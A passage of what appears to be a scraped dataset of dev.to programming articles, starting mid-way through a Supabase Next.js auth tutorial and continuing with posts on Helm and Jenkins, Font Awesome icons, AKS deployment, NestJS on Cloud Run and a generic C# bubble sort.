To do so, head over to [Supabase.io](Supabase.io) and click __Start Your Project__. Authenticate with GitHub and then create a new project under the organization that is provided to you in your account.

Give the project a Name and Password and click Create new project.
It will take approximately 2 minutes for your project to be created.
Next, open your terminal and create a new Next.js app:
```sh
npx create-next-app supabase-next-auth
cd supabase-next-auth
```
The only dependency we'll need is the [`@supabase/supabase-js`](https://github.com/supabase/supabase-js) package:
```sh
npm install @supabase/supabase-js
```
### Configuring the Supabase credentials
Now that the Next.js app is created, it needs a to know about the Supabase project in order to interact with it.
The best way to do this is using environment variables. Next.js allows environment variables to be set by creating a file called __.env.local__ in the root of the project and storing them there.
In order to expose a variable to the browser you have to prefix the variable with __NEXT_PUBLIC___.
Create a file called __.env.local__ at the root of the project, and add the following configuration:
```
NEXT_PUBLIC_SUPABASE_URL=https://app-id.supabase.co
NEXT_PUBLIC_SUPABASE_ANON_KEY=your-public-api-key
```
You can find the values of your API URL and API Key in the Supabase dashboard settings:

### Creating the Supabase client
Now that the environment variables have been set, we can create a Supabase instance that can be imported whenever we need it.
Create a file named __client.js__ in the root of the project with the following code:
```javascript
/* client.js */
import { createClient } from '@supabase/supabase-js'
const supabase = createClient(
process.env.NEXT_PUBLIC_SUPABASE_URL,
process.env.NEXT_PUBLIC_SUPABASE_ANON_KEY
)
export { supabase }
```
### Updating the __index__ page
Next, let's update __pages/index.js__ to be something more simple than what is provided out of the box. This is just meant to serve as a basic landing page
```javascript
/* pages/index.js */
import styles from '../styles/Home.module.css'
export default function Home() {
return (
<div className={styles.container}>
<main className={styles.main}>
<h1 className={styles.title}>
Hello World!
</h1>
</main>
</div>
)
}
```
### Creating the sign in screen
Next, let's create the Sign In screen. This will serve a form input for the user to provide their email address.
When the user submits the form, they will receive a magic link to sign in. This will work for both new as well as existing users!
Create a new file in the __pages__ directory named __sign-in.js__:
```javascript
/* pages/sign-in.js */
import { useState } from 'react'
import styles from '../styles/Home.module.css'
import { supabase } from '../client'
export default function SignIn() {
const [email, setEmail] = useState('')
const [submitted, setSubmitted] = useState(false)
async function signIn() {
const { error, data } = await supabase.auth.signIn({
email
})
if (error) {
console.log({ error })
} else {
setSubmitted(true)
}
}
if (submitted) {
return (
<div className={styles.container}>
<h1>Please check your email to sign in</h1>
</div>
)
}
return (
<div className={styles.container}>
<main className={styles.main}>
<h1 className={styles.title}>
Sign In
</h1>
<input
onChange={e => setEmail(e.target.value)}
style={{ margin: 10 }}
/>
<button onClick={() => signIn()}>Sign In</button>
</main>
</div>
)
}
```
The main thing in this file is this line of code:
```javascript
const { error, data } = await supabase.auth.signIn({
email
})
```
By only providing the email address of the user, magic link authentication will happen automatically.
### Profile view
Next, let's create the profile view. Create a new file in the __pages__ directory named __profile.js__:
```javascript
/* pages/profile.js */
import { useState, useEffect } from 'react';
import { supabase } from '../client'
import { useRouter } from 'next/router'
export default function Profile() {
const [profile, setProfile] = useState(null)
const router = useRouter()
useEffect(() => {
fetchProfile()
}, [])
async function fetchProfile() {
const profileData = await supabase.auth.user()
if (!profileData) {
router.push('/sign-in')
} else {
setProfile(profileData)
}
}
async function signOut() {
await supabase.auth.signOut()
router.push('/sign-in')
}
if (!profile) return null
return (
<div style={{ maxWidth: '420px', margin: '96px auto' }}>
<h2>Hello, {profile.email}</h2>
<p>User ID: {profile.id}</p>
<button onClick={signOut}>Sign Out</button>
</div>
)
}
```
To check for the currently signed in user we call `supabase.auth.user()`.
If the user is signed in, we set the user information using the `setProfile` function set up using the `useState` hook.
If the user is not signed in, we client-side redirect using the `useRouter` hook.
### API Route
In __pages/_app.js__ we'll be needing to call a function to set the cookie for retrieval later in the SSR route.
Let's go ahead and create that API route and function. This will be calling the `setAuthCookie` API given to us by the Supabase client.
Create a new file named __auth.js__ in the __pages/api__ folder and add the following code:
```javascript
/* pages/api/auth.js */
import { supabase } from '../../client'
export default function handler(req, res) {
supabase.auth.api.setAuthCookie(req, res)
}
```
### Nav, auth listener, and setting the session cookie
The largest chunk of code we'll need to write will be in __pages/app.js__. Here are the things we need to implement here:
1. Navigation
2. A listener to fire when authentication state changes (provided by Supabase)
3. A function that will set the cookie with the user session
In addition to this, we'll also need to keep up with the authenticated state of the user. We do this so we can toggle links, showing or hiding certain links based on if the user is or isn't signed in.
We'll demonstrate this here by only showing the __Sign In__ link to users who are not signed in, and hiding it when they are.
```javascript
/* pages/_app.js */
import '../styles/globals.css'
import { useState, useEffect } from 'react'
import Link from 'next/link'
import { supabase } from '../client'
import { useRouter } from 'next/router'
function MyApp({ Component, pageProps }) {
const router = useRouter()
const [authenticatedState, setAuthenticatedState] = useState('not-authenticated')
useEffect(() => {
/* fires when a user signs in or out */
const { data: authListener } = supabase.auth.onAuthStateChange((event, session) => {
handleAuthChange(event, session)
if (event === 'SIGNED_IN') {
setAuthenticatedState('authenticated')
router.push('/profile')
}
if (event === 'SIGNED_OUT') {
setAuthenticatedState('not-authenticated')
}
})
checkUser()
return () => {
authListener.unsubscribe()
}
}, [])
async function checkUser() {
/* when the component loads, checks user to show or hide Sign In link */
const user = await supabase.auth.user()
if (user) {
setAuthenticatedState('authenticated')
}
}
async function handleAuthChange(event, session) {
/* sets and removes the Supabase cookie */
await fetch('/api/auth', {
method: 'POST',
headers: new Headers({ 'Content-Type': 'application/json' }),
credentials: 'same-origin',
body: JSON.stringify({ event, session }),
})
}
return (
<div>
<nav style={navStyle}>
<Link href="/">
<a style={linkStyle}>Home</a>
</Link>
<Link href="/profile">
<a style={linkStyle}>Profile</a>
</Link>
{
authenticatedState === 'not-authenticated' && (
<Link href="/sign-in">
<a style={linkStyle}>Sign In</a>
</Link>
)
}
<Link href="/protected">
<a style={linkStyle}>Protected</a>
</Link>
</nav>
<Component {...pageProps} />
</div>
)
}
const navStyle = {
margin: 20
}
const linkStyle = {
marginRight: 10
}
export default MyApp
```
The last page we need to implement is the route that will demonstrate server-side protection and redirects.
Since we have already implemented setting the cookie, we should now be able to read the cookie on the server if the user is signed in.
Like I mentioned previously, we can do this with the `getUserByCookie` function.
Create a new file in the __pages__ directory named __protected.js__ and add the following code:
```javascript
import { supabase } from '../client'
export default function Protected({ user }) {
console.log({ user })
return (
<div style={{ maxWidth: '420px', margin: '96px auto' }}>
<h2>Hello from protected route</h2>
</div>
)
}
export async function getServerSideProps({ req }) {
/* check to see if a user is set */
const { user } = await supabase.auth.api.getUserByCookie(req)
/* if no user is set, redirect to the sign-in page */
if (!user) {
return { props: {}, redirect: { destination: '/sign-in' } }
}
/* if a user is set, pass it to the page via props */
return { props: { user } }
}
```
## Testing it out
Now the app is built and we can test it out!
To run the app, open your terminal and run the following command:
```sh
npm run dev
```
When the app loads, you should be able to sign up, and sign in using the magic link. Once signed in, you should be able to view the profile page and see your user id as well as your email address.
### Setting metadata and attributes
If you want to continue building out the user's profile, you can do so easily using the `update` method.
For example, let's say we wanted to allow the user's to set their location. We can do so with the following code:
```javascript
const { user, error } = await supabase.auth.update({
data: {
city: "New York"
}
})
```
Now, when we fetch the user's data, we should be able to view their metadata:

> The final code for this project is located [here](https://github.com/dabit3/supabase-nextjs-auth) | dabit3 |
757,644 | Moving fast, it’s more than breaking things | I’ve been thinking about the saying “move fast and break things” lately. First, Armory’s CEO, DROdio,... | 0 | 2021-07-13T01:40:41 | https://dev.to/justjenu/moving-fast-it-s-more-than-breaking-things-kh9 | movefast | ---
title: Moving fast, it’s more than breaking things
published: true
description:
tags: movefast,
//cover_image: https://direct_url_to_image.jpg
---
I’ve been thinking about the saying “move fast and break things” lately. First, [Armory](https://www.armory.io/)’s CEO, DROdio, did a tech talk with [Launch Darkly](https://launchdarkly.com/"), [Pulumi](https://pulumi.com/"), and [SD Times](https://sdtimes.com"): [Move Fast & DON’T Break Things: Modernize Your SDLC without Compromising Customer Trust](https://sdtimes.com/move-fast-dont-break-things-modernize-your-sdlc-without-compromising-customer-trust/). The talk really resonated with me for a number of reasons:
* It really did a great job of spelling out the importance of getting code out - and the cost for not doing so. Equating code to inventory and having to watch to ensure that it doesn’t go stale, was a really great way to frame this. It’s always a challenge to balance the tech debt with the new things. Who wants to work on redoing something you’ve already done when you can be working on something new and exciting?
* It highlighted why you have to move - it is not an option not to. Think of all of your inventory rotting and going bad. You can’t continue to build or rely on a base that is not strong enough to support what you are doing.
* And most of all, it highlights the thinking and challenges that companies that are enabling businesses to move fast are looking at and addressing.
On the other hand, I’ve been listening to the [podcast](https://softwareengineeringdaily.com/2021/07/11/full-audiobook-move-fast-how-facebook-builds-software/) as well as [reading the book](https://www.amazon.com/Move-Fast-Facebook-Builds-Software-ebook/dp/B093HMJ4KB) from [Software Daily’s Jeff Meyerson](https://softwareengineeringdaily.com/tag/jeff-meyerson/) on how Facebook builds software. This had a lot of similarities and also a lot of ideas in it that illustrated how Facebook has been so successful as an engineering organization.
I was at Heroku for four years and one of the things that really inspired me more than anything, is what Heroku customers were able to do with Heroku - and how quickly. When the pandemic hit, I witnessed story after story - and even helped tell a few of them - on how companies pivoted, how people created apps/solutions to help their neighborhoods or others in need, and the list goes on.
The number of disruptive businesses that were able to join the market with great success, as they were born in the cloud, just keeps growing.
I watch all of this and part of me laments for the “mom and pop” stores and a simpler time, but the larger part of me is constantly amazed by the great minds and innovation that are touching all of us in so many industries and so many different ways.
So, why does move fast resonate with me so much? Yes, it’s all of the above, but even more than that, I have come to realize that I am happiest and at home in environments and cultures that do move fast, that aren’t afraid to try new things, but ones that are ensuring that none of it is at the expense of the customer.
I’ve always love this quote from Mark Twain:
> “I didn't have time to write a short letter, so I wrote a long one instead.”
Sometimes you do have to start with the long letter - or the mvp. But when things matter, moving fast doesn’t have to mean that the short letter can’t be written or shouldn’t be written... all good things take the right amount of time. The world moves fast, and I have to say that I am quite happy to be moving as fast as I can to stay on the ride.
<center>

<caption><a href="https://giphy.com/gifs/trippy-space-photos-3oFzm4qdAdgWjTBidG">via GIPHY</a></caption></center>
| justjenu |
757,779 | Helm: Kubernetes package manager | What is Helm ?? Helm is the first application package manager running atop Kubernetes. It... | 0 | 2021-09-25T06:29:29 | https://dev.to/piyushbagani15/helm-kubernetes-package-manager-4ocb | kubernetes, helm, charts, devops | ## What is Helm ??
Helm is the first application package manager running atop Kubernetes. It allows describing the application structure through convenient helm-charts and managing it with simple commands.
Helm provides the same basic feature set as many of the package managers you may already be familiar with, such as Debian’s apt, or Python’s pip.
Helm can:
- Install software.
- Automatically install software dependencies.
- Upgrade software.
- Configure software deployments.
- Fetch software packages from repositories.
Helm helps you to manage Kubernetes applications. Helm Charts helps you to install, manage and upgrade even the most complex applications. Helm is a third part tool that manages K8s package.
Package in Kubernetes is known as Charts. Either we can download Charts from some repository or we can create our own custom chart.
### In this article we will create own custom chart.
For this Interesting We'll use AWS Cloud for setting up Kubernetes Master and Kubernetes Slave. If you are interested in setting up this cluster you can read one of my another [blog](https://dev.to/piyushbagani15/configuring-kubernetes-multinode-cluster-over-aws-using-ansible-2fhe).
### Here We'll integrate Jenkins with Helm.

### Installing Helm
We have to install Helm in client side. Most common and preferred way is to install it from binary.
Here you will find the link for downloading the binary of Helm Version 3
https://get.helm.sh/helm-v3.5.2-linux-amd64.tar.gz

Copy the directory linux-amd64/helm to /usr/bin/
We can check the version of Helm by the below command.
helm version
After setting up K8s Cluster let’s start creating our own custom charts. Create a workspace where we will create Charts.

Configuration file for the chart is Chart.yaml. We have to create Chart.yaml and it is compulsory to have capital ‘C’ in Chart.yaml.
Content inside Chart.yaml is as follows

Create template directory inside your workspace.

Next we can create deployment.yaml by the command provided below. In this deployment code we are using the Jenkins image. The yaml code for deployment.yaml will look like as below

Now Let's install the helm chart.

Let’s check whether the pods are running or not? and also we can check is 'none' services running apart from kubernetes of type Cluster-Ip.


Now we will expose the Jenkins server and the service.yaml is as below.

Let’s see the new services has launched or not?

Now we can check that our Jenkins server is publicly accessible or not. By hitting to the "http://public_ip_address:exposed_port"

For getting the password of running Jenkins server, we will do login inside the pod and view the file that contains the Jenkins server password.
Location of the password file is /var/jenkins_home/secrets/initialAdminPassword

Now from the above file we can copy the password and paste it in the above displayed page.

Voila, We did it, Now further you can configure it according to the requirements.
### That’s all for now.
### Thanks for reading the Article.
### Happy Helming!
| piyushbagani15 |
757,786 | Adding Social Media icons in HTML | If you are new to web development, you might have wondered how to add social media icons to your... | 0 | 2021-07-13T05:42:38 | https://dev.to/anjalijha22/adding-social-media-icons-in-html-o9 | beginners, html, webdev | If you are new to web development, you might have wondered how to add social media icons to your website to help expand its reach and connectivity. I figured out just few days ago-
There are various options, but I used a popular toolkit called Font Awesome.
####Step 1:
To get started, open the link below-
https://fontawesome.com/
####Step 2:
Click on start for free and enter your email id to receive a kit code. You will receive an email for confirmation and setting up your account.
####Step 3:

You will be greeted with a kit code, which needs to be copied and pasted in the head section of your HTML.
####Step 4:
You can now browse to any icons on the Font Awesome webpage. Select the icon you wish to use and copy the associated HTML code. You can use this code in your HTML page and would be able to see the icon that you wished to.
To increase or decrease the size of the icon you can just manipulate your code a little.
```
<i class="fab fa-twitter"></i>
```
The size of the above icon can be enlarged by -
```
<i class="fab fa-twitter fa-5x"></i>
```
or
```
<i class="fab fa-twitter fa-6x"></i>
```
Hope you get the idea!!!!
| anjalijha22 |
778,686 | Deploy to Azure Kubernetes (AKS) from Azure DevOps with Azure Pipelines | Do you want to Deploy to Azure Kubernetes (AKS) from Azure DevOps, but you don't know where to start?... | 0 | 2021-08-02T01:24:32 | https://dev.to/n3wt0n/deploy-to-azure-kubernetes-aks-from-azure-devops-with-azure-pipelines-37b2 | azure, azuredevops, aks, kubernetes | Do you want to __Deploy to Azure Kubernetes (AKS) from Azure DevOps__, but you don't know where to start? This is for you!
In this live streaming, part of the "_Build Live with Me_" series, I'm going to deploy an application to Azure Kubernetes Service (AKS) via Azure DevOps using Azure Pipelines from scratch, live!
You will learn how to set up the __integration with AKS__, and how to __deploy everything__ to Kubernetes in Microsoft Azure using Azure Pipelines.
{% youtube 4Oa5HneTuKs %}
[Link to the video: https://youtu.be/4Oa5HneTuKs](https://youtu.be/4Oa5HneTuKs)
See you there!
__Like, share and follow me__ 🚀 for more content:
📽 [YouTube](https://www.youtube.com/CoderDave)
☕ [Buy me a coffee](https://buymeacoffee.com/CoderDave)
💖 [Patreon](https://patreon.com/CoderDave)
🌐 [CoderDave.io Website](https://coderdave.io)
👕 [Merch](https://geni.us/cdmerch)
👦🏻 [Facebook page](https://www.facebook.com/CoderDaveYT)
🐱💻 [GitHub](https://github.com/n3wt0n)
👲🏻 [Twitter](https://www.twitter.com/davide.benvegnu)
👴🏻 [LinkedIn](https://www.linkedin.com/in/davidebenvegnu/)
🔉 [Podcast](https://geni.us/cdpodcast)
<a href="https://www.buymeacoffee.com/CoderDave" target="_blank"><img src="https://cdn.buymeacoffee.com/buttons/v2/default-yellow.png" alt="Buy Me A Coffee" style="height: 30px !important; width: 108px !important;" ></a>
| n3wt0n |
778,817 | Deploying NestJS API to Cloud Run using Cloud Build | NestJS is a NodeJS framework and deploying NodeJS API sometimes can be so challenging. Let's say for... | 0 | 2021-08-02T04:34:23 | https://dev.to/ajipandean/deploy-nestjs-api-to-cloud-run-using-cloud-build-66a | node, nestjs, cloudrun, api | NestJS is a NodeJS framework and deploying NodeJS API sometimes can be so challenging. Let's say for example you have VPS ready to be the place for your API to live. When you want to deploy your API to that VPS there are a lot of works to do. Starts from setting up environment for developing the API, then developing the actual API, configuring process manager like PM2, configuring web server like nginx and etc, etc. After a lot of works, finally your app is ready to serve.
Well, maybe some of you already get used to it, so it doesn't seems that complicated. But what about the beginner programmer? They definitely got intimidated by those steps to do (just like me in the past) :D. So if you feel the same like me in the past, then you in the right place.
Fortunately, at Google Cloud Next 2019, Google announced a serverless service where you can deploy your NodeJS API easily without worrying about ton of steps above. This service called Cloud Run.
Cloud Run basically is a fully-managed and highly scalable platform for deploying containerized app. Where "fully-managed" here means that Google takes care of the server for you, so you don't have to worry about managing and maintaining the server, and "highly scalable" here means that your service will be either increased or decreased dynamically based on the traffic to that service.
In this article, I will show you how to deploy your NodeJS API using NestJS to Google Cloud Run. We will use Docker for containerizing our application. So I assume that you have a bit knowledge of what Docker is or at least you have heard about it.
So, let's get started.
---
## Create NestJS API
So first of all, let's create our brand new NestJS app by simply run the command below on your Terminal or Command Prompt for Windows.
```bash
$ npm i -g @nestjs/cli
$ nest new <your-app-name>
```
After it finished, as you can see, there are a bunch of files generated automatically by NestJS. We are not going to touch any of these files. Instead, we want to test the API by simply running the command below.
```bash
$ yarn start:dev # if you choose yarn
$ npm run start:dev # if you choose npm
```
Then you can visit `[http://localhost:3000](http://localhost:3000)` on your favorite browser and your should see `Hello, world` showing up on the screen.
---
## Containerize NestJS API
As I mentioned before, Cloud Run is a service for deploying containerized app. It means that we should bundle our API into container by using Docker — it can be anything actually, but Docker is the most popular one — and then deploy that container to Cloud Run.
So in case you don't know what the container is, basically container just bundle our API along with its dependencies and environments, so the API that runs on Cloud Run has the same dependencies and environments with the API that runs on our local machine.
Okay enough theory, let's containerize our API.
So the first thing that we have to do for containerizing our API is creating a file called `Dockerfile` in the root of our project directory. Then just copy and paste code below into `Dockerfile`.
```docker
FROM node:erbium-alpine3.14
WORKDIR /app
COPY package.json .
RUN yarn
COPY . .
RUN yarn build
EXPOSE 3000
CMD [ "yarn", "start:prod" ]
```
Let's take a look of what we just did here.
We just created a `Dockerfile` which is required by Docker to build image from an instructions that we wrote in that file.
Inside the `Dockerfile` we have a lot of stuff going on, let's cover them one by one.
1. `FROM node:erbium-alpine3.14` tells Docker that we are going to use node:erbium-alpine3.14 as our base image. So here, we don't have to install & configure NodeJS manually by ourselves.
2. `WORKDIR /app` tells Docker to create a directory called `/app` and redirect us to that directory. It basically quite similar to `mkdir /app && cd /app`.
3. `COPY package.json .` tells Docker to copy package.json file from our project on local computer to `/app` directory inside our container.
4. `RUN yarn` tells Docker to install all dependencies needed for our API.
5. `COPY . .` tells Docker to copy all files from our project on local computer to `/app` directory inside our container.
6. `RUN yarn build` tells Docker to build our API.
7. `EXPOSE 3000` tells Docker to open port 3000 for external access.
8. `CMD [ "yarn", "start:prod" ]` tells Docker to execute this command whenever we run our image.
Okay, we've created our `Dockerfile` but we still don't have image yet. Before we do that, since we are building NestJS app which is literally NodeJS, we have to ignore `node_modules` from being copied during building. Because, the size of `node_modules` is quite big and can slow down the performance of building an image.
In order to ignore some files or folders, we have to create another file called `.dockerignore` in the root of our project folder. After that, just copy and paste code below into `.dockerignore`.
```bash
node_modules/
.git/
```
Now we're ready to build our image, in order to build Docker image, we just have to run command below.
```bash
$ docker build -t <image_name:tag> .
```
Let's cover above command one by one.
1. `docker build` tells Docker to build our image based on Dockerfile.
2. `-t <image_name:tag>` parameter used to specifies the name of the image and also tag (for versioning purpose) for our image.
3. `.` this 'dot' sign refers to current directory where the Docker will look for Dockerfile to build an image.
Now you can test your image by running `docker run` command.
```bash
$ docker run -it -p 3000:3000 <image-name:tag>
```
Then you can visit `[http://localhost:3000](http://localhost:3000)` and you should see the same result as before. But now your app runs on Docker container.
To stop the running container, just hit `Ctrl + c`.
---
## Host our code to GitHub
Before we deploy our code to Cloud Run, let's host our code first to Github so that we can clone this code to Google Cloud Shell to perform deployment. You can do it by yourself, but in case you don't know how, just copy and paste bellow commands and run on your terminal.
```bash
$ git init
$ git add .
$ git commit -m "my api project, finished"
$ git remote add origin <your-repository-url>
$ git branch -M main
$ git push origin main
```
---
## Deploy to Cloud Run
Alright, now we have all the requirements we need.
We've created our API and also containerized it with the help of Docker. Now, we're ready to deploy our API to Cloud Run.
Well, it quite simple I think cause we just have to do few steps to complete it :D
Okay let's deploy.
In order to deploy our API to Cloud Run, we'll use Google Cloud service called Cloud Build. This service will automate our deployment to Cloud Run.
First of all, create new project on GCP Console. Then copy the ID of your project.
Then to use Cloud Build, we have to create another file in our root project directory called `cloudbuild.yaml`. Then copy and paste following code to your `cloudbuild.yaml`.
```yaml
steps:
# Build the container image
- name: 'gcr.io/cloud-builders/docker'
args: ['build', '-t', 'gcr.io/PROJECT_ID/IMAGE', '.']
# Push the container image to Container Registry
- name: 'gcr.io/cloud-builders/docker'
args: ['push', 'gcr.io/PROJECT_ID/IMAGE']
# Deploy container image to Cloud Run
- name: 'gcr.io/google.com/cloudsdktool/cloud-sdk'
entrypoint: gcloud
args: ['run', 'deploy', 'SERVICE-NAME', '--image', 'gcr.io/PROJECT_ID/IMAGE', '--region', 'REGION', '--platform', 'managed', '--port', '3000']
images:
- gcr.io/PROJECT_ID/IMAGE
```
That just template, customize to fit your case. Don't forget to add `--port 3000` after `--platform managed`, since our app listen on port 3000.
The template code is available on Google Cloud Build documentation [here](https://cloud.google.com/build/docs/deploying-builds/deploy-cloud-run). Just head on to there, scroll until you find "Building and deploying a container" title and read it what the meaning of the above code.
Now push your `cloudbuild.yaml` to GitHub.
```bash
$ git add .
$ git commit -m "added cloudbuild.yaml file"
$ git push origin main
```
Back to your GCP Console, open Cloud Shell. Then make directory called whatever you want. I'll name it "projects" for now.
```bash
$ mkdir projects
$ cd projects
```
Clone your code from GitHub that we just created earlier.
```bash
$ git clone <your-repository-url>
$ cd <your-project-name>
```
Then finally run below command to deploy your API to Cloud Run.
```bash
$ gcloud builds submit
```
If you got permission "run.service.get" error during `gcloud builds submit` you can go [here](https://cloud.google.com/build/docs/deploying-builds/deploy-cloud-run#required_iam_permissions) and then enabled "Cloud Run Admin". After that, run again `gcloud builds submit`.
After it finished, go to Cloud Run dashboard, and click on the service that you just created.
Click "Permissions" tab and then click "+ Add".
For "New members" field, type `allUsers` and for "Role" field, select **Cloud Run Invoker**.
Click **Save**, then **Allow Public Access** and re-run `gcloud builds submit`.
We're done.
---
Alright, I think that's all for Deploy NestJS API to Cloud Run episode.
Well, this is my first article of my life. I know it's not perfect yet, I feel that :D but don't worry, I'll keep improving my writing skill.
Hopefully, you can get something new from this tutorial. Thanks for reading.
See you on the next article :D | ajipandean |
778,864 | Generic bubble sort in C# .NET | Early this year, I decided to brush up on my algorithms and data structure knowledge. I took these... | 0 | 2021-08-02T15:51:24 | https://swimburger.net/blog/dotnet/generic-bubble-sort-in-csharp-dotnet | dotnet, csharp | ---
title: Generic bubble sort in C# .NET
published: true
date: 2021-08-01 00:00:00 UTC
tags: dotnet, csharp
canonical_url: https://swimburger.net/blog/dotnet/generic-bubble-sort-in-csharp-dotnet
---
Early this year, I decided to brush up on my algorithms and data structure knowledge. I took these great two courses ([1](https://www.pluralsight.com/courses/algorithms-data-structures-part-one), [2](https://www.pluralsight.com/courses/algorithms-data-structures-part-two)) on PluralSight by Robert Horvick.
To practice what I learned in this course, I decided to create generic versions of the different algorithms and data structures.
What do I mean by generic versions? These types of courses always use integers or strings to demonstrate the algorithms. Instead of using those primitive data types, I'm reimplementing the algorithms and data structures using C#'s [generic type parameters](https://docs.microsoft.com/en-us/dotnet/csharp/programming-guide/generics/generic-type-parameters).
Here's a console application with a generic method `BubbleSort` to perform a bubble sort on an enumerable:
```csharp
using System;
using System.Collections.Generic;
using System.Linq;
class Program
{
static void Main(string[] args)
{
var randomNumbers = new int[] { 5, 4, 5, 7, 6, 9, 4, 1, 1, 3, 4, 50, 56, 41 };
var sortedNumbers = BubbleSort(randomNumbers);
PrintList(sortedNumbers);
Console.ReadKey();
}
private static IEnumerable<T> BubbleSort<T>(IEnumerable<T> list) where T : IComparable
{
T[] sortedList = list.ToArray();
int listLength = sortedList.Length;
while (true)
{
bool performedSwap = false;
for (int currentItemIndex = 1; currentItemIndex < listLength; currentItemIndex++)
{
int previousItemIndex = currentItemIndex - 1;
T previousItem = sortedList[previousItemIndex];
T currentItem = sortedList[currentItemIndex];
var comparison = previousItem.CompareTo(currentItem);
if (comparison > 0)
{
sortedList[previousItemIndex] = currentItem;
sortedList[currentItemIndex] = previousItem;
performedSwap = true;
}
}
if (!performedSwap)
{
break;
}
}
return sortedList;
}
private static void PrintList<T>(IEnumerable<T> list)
{
foreach (var item in list)
{
Console.WriteLine(item);
}
}
}
```
By using a generic type parameter with the constraint that the type has to implement the `IComparable` interface, you can perform the bubble sort algorithm without knowing the exact type you are working with.
If you want to understand the logic behind the bubble sort algorithm, I recommend checking out the courses mentioned earlier. There's also a lot of other great resources out there online!
Disclaimer: This code works, but is only developed for the sake of practice. Use at your own risk or just use a sorting library. If you see some room for improvement, there most likely is, I'm all ears~ | swimburger |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.